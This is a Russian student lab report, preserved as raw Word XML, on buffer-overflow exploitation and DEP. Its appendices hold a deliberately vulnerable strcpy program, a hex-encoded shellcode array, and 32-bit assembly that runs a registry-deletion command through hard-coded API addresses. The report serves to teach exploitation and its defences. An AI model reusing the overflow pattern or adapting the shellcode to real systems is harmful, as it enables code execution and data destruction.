        <w:t xml:space="preserve">: DEP помечает определенные области памяти (например, стек, кучу и сегменты данных) как недоступные для выполнения кода. Если процесс пытается выполнить инструкции из этих областей, операционная система немедленно завершает его выполнение, предотвращая эксплуатацию уязвимости. Механизм защиты от переполнения буфера: Атаки на переполнение буфера часто используют стек или кучу для размещения вредоносного shellcode. DEP препятствует их успешному выполнению, так как даже если злоумышленник записал код в память, передача управления на этот код приведет к срабатыванию защиты и аварийному завершению процесса. Типы </w:t>
      </w:r>
      <w:r w:rsidRPr="00012770">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00012770">
        <w:t>: 1) Аппаратный DEP – реализуется на уровне процессора (например, с использованием NX-бита (No eXecute) в архитектуре x86/x64), предотвращая исполнение кода в запрещенных областях. 2) Программный DEP – реализуется в Windows и других ОС, отслеживая возвраты из функций и предотвращая их перенаправление на несанкционированные адреса. DEP является мощной технологией защиты, предотвращающей исполнение кода из данных, что делает атаки на переполнение буфера значительно сложнее. В сочетании с ASLR и другими механизмами он значительно повышает безопасность современных операционных систем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA9BF0" w14:textId="3130B874" w:rsidR="007B120C" w:rsidRDefault="00C93DCC" w:rsidP="000068B8">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BCCDD4" w14:textId="2F5A8AA3" w:rsidR="00551A9F" w:rsidRPr="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="00551A9F">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00551A9F">
        <w:t xml:space="preserve">В ходе выполнения лабораторной работы была успешно исследована и продемонстрирована эксплуатация уязвимости переполнения буфера в программном обеспечении. Разработанная уязвимая программа на языке C, использующая небезопасную функцию </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00551A9F">
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00551A9F">
        <w:t>), наглядно показала классический пример данной уязвимости. Для демонстрации возможных последствий был создан специальный шелл-код на ассемблере, который выполнял удаление заданного ключа в системном реестре Windows (HKCU\Test). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB41B8" w14:textId="77777777" w:rsidR="00551A9F" w:rsidRDefault="00551A9F" w:rsidP="004B1E86">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2742FEFB" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRPr="00551A9F" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FDC395" w14:textId="27E1B594" w:rsidR="006329E3" w:rsidRDefault="006329E3" w:rsidP="00B27C73">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r w:rsidR="00551A9F">
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="004B1E86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF6CD2D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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562A02A6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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B48933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int argc, char* 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argv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D003CC6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D284A33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  char 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buf[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12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1DB3714D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strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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buf, 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argv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B1E86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80E6A99" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRPr="007C2C7E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4B1E86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C2C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C2C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"%s", buf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C2C7E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C1C17F8" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRPr="007C2C7E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7C2C7E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7C2C7E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7F60FEAB" w14:textId="18FFBD12" w:rsidR="00551A9F" w:rsidRPr="007C2C7E" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A508CA7" w14:textId="7DC67A1F" w:rsidR="006329E3" w:rsidRPr="007C2C7E" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/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Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C7E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> №1 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Уязвимая</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C7E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программа</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C7E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD308FA" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRPr="007C2C7E" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCBD2D6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#include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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964392E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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F26097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main(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argc, char*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argv[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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41707A9D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CB93F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char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buf[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12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];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FFB620E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char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shell[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1024] = "\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x49\xAC\x2B\x76\xEB\x10\x5B\x53\xB9\xC0\x3B\x49\x75\xFF\xD1\xBB\x90\xA3\x45\x75\xFF\xD3\xE8\xEB\xFF\xFF\xFF\x52\x45\x47\x20\x44\x45\x4C\x45\x54\x45\x20\x48\x4B\x45\x59\x5F\x43\x55\x52\x52\x45\x4E\x54\x5F\x55\x53\x45\x52\x5C\x54\x65\x73\x74\x20\x2F\x76\x20\x74\x65\x73\x74\x20\x2F\x66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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79ED8774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strcpy(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buf, shell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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28725B36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printf(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"%s", buf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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4621FA03" w14:textId="77777777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r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29FD20" w14:textId="2081254D" w:rsidR="004B1E86" w:rsidRPr="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709"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4B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0E8D5" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42533C75" w14:textId="5EE42E8D" w:rsidR="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567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№2 – Уязвимая программа с шелл-кодом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE98067" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D49DA66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#include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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C3D37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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D54FBA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main(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argc, char*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argv[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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A609039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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4589CC00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char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buf[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12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];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5263E80D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char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shell[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1024] = "\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x49\xAC\x2B\x76\xEB\x10\x5B\x53\xB9\xC0\x3B\x49\x75\xFF\xD1\xBB\x90\xA3\x45\x75\xFF\xD3\xE8\xEB\xFF\xFF\xFF\x52\x45\x47\x20\x44\x45\x4C\x45\x54\x45\x20\x48\x4B\x45\x59\x5F\x43\x55\x52\x52\x45\x4E\x54\x5F\x55\x53\x45\x52\x5C\x54\x65\x73\x74\x20\x2F\x76\x20\x74\x65\x73\x74\x20\x2F\x66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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5DCA2292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strncpy(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buf, shell, 11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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E9D31CD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printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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"%s", buf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F8C5B7D" w14:textId="77777777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4B1E86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</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725795B" w14:textId="269EB855" w:rsidR="004B1E86" w:rsidRPr="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"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4B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A826B" w14:textId="5F59F5D0" w:rsidR="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="004B1E86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14:paraId="5F840C0C" w14:textId="7A00B8D8" w:rsidR="004B1E86" w:rsidRDefault="004B1E86" w:rsidP="00B30AC6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567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№3 – безопасная программа с шелл-кодом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AADA0E" w14:textId="77777777" w:rsidR="00B30AC6" w:rsidRDefault="00B30AC6" w:rsidP="00B30AC6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478195BB" w14:textId="47F1EBBF" w:rsidR="004B1E86" w:rsidRPr="007C2C7E" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C7E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Б</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D1F8A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[BITS 32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711FC2A7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section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B727B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global _start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE3D597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B85D3D3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_start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C3AEB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jmp short get_command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D0730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</w:p>
    <w:p w14:paraId="14D990A9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execute_command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F5D29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pop ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5EFD3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push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE23ED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mov ecx, 0x75493BC0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B536BA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call ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470172AF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mov ebx, 0x7545A390</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9979BF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call ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E04385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D8B0275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>get_command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA24BD" w14:textId="77777777" w:rsidR="004B1E86" w:rsidRPr="004B1E86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call execute_command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F9426" w14:textId="19901F3C" w:rsidR="004B1E86" w:rsidRPr="007C2C7E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  <w:r w:rsidRPr="004B1E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    db 'REG DELETE HKCU\Test /v test /f', 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6596B2EF" w14:textId="49506ADC" w:rsidR="004B1E86" w:rsidRPr="007C2C7E" w:rsidRDefault="004B1E86" w:rsidP="004B1E86">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D2E060" w14:textId="328140DC" w:rsidR="00B30AC6" w:rsidRDefault="00B30AC6" w:rsidP="00B30AC6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567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№4 – ассемблерный вид шелл-кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E08FCB1" w14:textId="77777777" w:rsidR="00B30AC6" w:rsidRPr="004B1E86" w:rsidRDefault="00B30AC6" w:rsidP="004B1E86">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B30AC6" w:rsidRPr="004B1E86" w:rsidSect="00D60F7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47FA" w14:textId="77777777" w:rsidR="003C33AD" w:rsidRPr="00D60F71" w:rsidRDefault="003C33A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A744E21" w14:textId="77777777" w:rsidR="003C33AD" w:rsidRPr="00D60F71" w:rsidRDefault="003C33A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77BA" w14:textId="77777777" w:rsidR="003C33AD" w:rsidRPr="00D60F71" w:rsidRDefault="003C33A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AD5F181" w14:textId="77777777" w:rsidR="003C33AD" w:rsidRPr="00D60F71" w:rsidRDefault="003C33A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105D62C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C13A41C2"/>
    <w:lvl w:ilvl="0" w:tplc="DF1833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354CC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0CCF7D8"/>
    <w:lvl w:ilvl="0" w:tplc="8EACF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BC63B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6054D060"/>
    <w:lvl w:ilvl="0" w:tplc="647082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3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1796412997">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1980568422">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1530139892">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1948196307">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1774326711">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1837063960">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="208494742">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="224336886">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1145396552">
    <w:abstractNumId w:val="28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3"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1713382370">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1581139687">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="856501173">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1460949377">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="980890868">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="939266093">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="421032543">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1298991839">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1229271623">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1925413292">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="384646875">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1979188035">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1589266632">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1783642990">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1026908169">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1847018921">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="840199240">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="228922769">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="633753433">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="61758796">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1670671658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7CF"/>
    <w:rsid w:val="000068B8"/>
    <w:rsid w:val="00012770"/>
    <w:rsid w:val="00027EE5"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="000410BB"/>
    <w:rsid w:val="00041235"/>
    <w:rsid w:val="0005021A"/>
    <w:rsid w:val="00054A74"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="00081B96"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000C301F"/>
    <w:rsid w:val="000C7F2B"/>
    <w:rsid w:val="000E2F6F"/>
    <w:rsid w:val="000F6C71"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="000F7368"/>
    <w:rsid w:val="00112350"/>
    <w:rsid w:val="00145D4B"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00153EB5"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="00165B6D"/>
    <w:rsid w:val="001734FA"/>
    <w:rsid w:val="00175CA0"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="0018650A"/>
    <w:rsid w:val="00187ED6"/>
    <w:rsid w:val="001A090C"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001C3066"/>
    <w:rsid w:val="001D4F9A"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="002023C8"/>
    <w:rsid w:val="00221913"/>
    <w:rsid w:val="002359F2"/>
    <w:rsid w:val="00241362"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="002662E1"/>
    <w:rsid w:val="0027317B"/>
    <w:rsid w:val="0027419F"/>
    <w:rsid w:val="00276839"/>
    <w:rsid w:val="00292575"/>
    <w:rsid w:val="002A4EEC"/>
    <w:rsid w:val="002A5C55"/>
    <w:rsid w:val="002B17EE"/>
    <w:rsid w:val="002B7253"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D341A"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="002E7EEE"/>
    <w:rsid w:val="0030165B"/>
    <w:rsid w:val="003018D3"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00330315"/>
    <w:rsid w:val="00330853"/>
    <w:rsid w:val="00334680"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00346224"/>
    <w:rsid w:val="00362965"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00386026"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003C33AD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23E27"/>
    <w:rsid w:val="00430ED2"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="004541B3"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="00485DF1"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004B1E86"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004B7535"/>
    <w:rsid w:val="004E171E"/>
    <w:rsid w:val="004F05FC"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F5FFF"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="005140C2"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="005333D0"/>
    <w:rsid w:val="0053501C"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="00550830"/>
    <w:rsid w:val="00551A9F"/>
    <w:rsid w:val="00556B29"/>
    <w:rsid w:val="005573D7"/>
    <w:rsid w:val="00571170"/>
    <w:rsid w:val="00576774"/>
    <w:rsid w:val="00577DB3"/>
    <w:rsid w:val="005A54A6"/>
    <w:rsid w:val="005B4AE8"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D7EE9"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005E71E3"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="005F76D3"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="0061313D"/>
    <w:rsid w:val="00623E64"/>
    <w:rsid w:val="006315C0"/>
    <w:rsid w:val="006329E3"/>
    <w:rsid w:val="00650CC7"/>
    <w:rsid w:val="00661B7E"/>
    <w:rsid w:val="00665AFA"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="006829C1"/>
    <w:rsid w:val="00694A7B"/>
    <w:rsid w:val="006970F4"/>
    <w:rsid w:val="00697860"/>
    <w:rsid w:val="00697D22"/>
    <w:rsid w:val="006A31B9"/>
    <w:rsid w:val="006A39E5"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006C40D5"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D44B9"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F2DE7"/>
    <w:rsid w:val="006F31F2"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="00715D8F"/>
    <w:rsid w:val="0072270C"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00724701"/>
    <w:rsid w:val="00734BAB"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="00754DA0"/>
    <w:rsid w:val="00761EE3"/>
    <w:rsid w:val="00773594"/>
